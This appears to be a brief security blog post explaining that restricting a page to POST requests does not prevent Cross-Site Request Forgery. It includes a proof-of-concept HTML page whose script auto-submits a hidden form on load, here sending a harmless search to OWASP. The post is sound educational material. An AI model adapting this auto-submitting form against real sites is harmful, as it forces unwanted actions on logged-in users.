For anyone who needs a primer on Cross-Site Request Forgery(CSRF), I would recommend reading the White Paper from White Hat: https://www.whitehatsec.com/resource/whitepapers/csrf_cross_site_request_forgery.html
I ran into a website the other day that thought only accepting POST data on a page was sufficient protection against CSRF attacks. Not so. A form can almost as easily be automatically sent via POST as it can via GET. Below you will find some example code that could be placed on a page to automatically exploit CSRF via POST.
<html>
<body>
<form name="csrf" action="https://www.owasp.org/index.php/Special:Search" method="post" id="csrf">
<input type="hidden" name="search" value="csrf" />
</form>
<script type="text/javascript">
function csrf_post () {
var form = document.getElementById("csrf");
form.submit();
}
window.onload = csrf_post;
</script>
</body>
</html>
I am sure that there are many effective ways to do this, so post a comment with your favorite way to exploit CSRF via POST and why.
(Hee hee, "POST a comment", I'm so funny.)
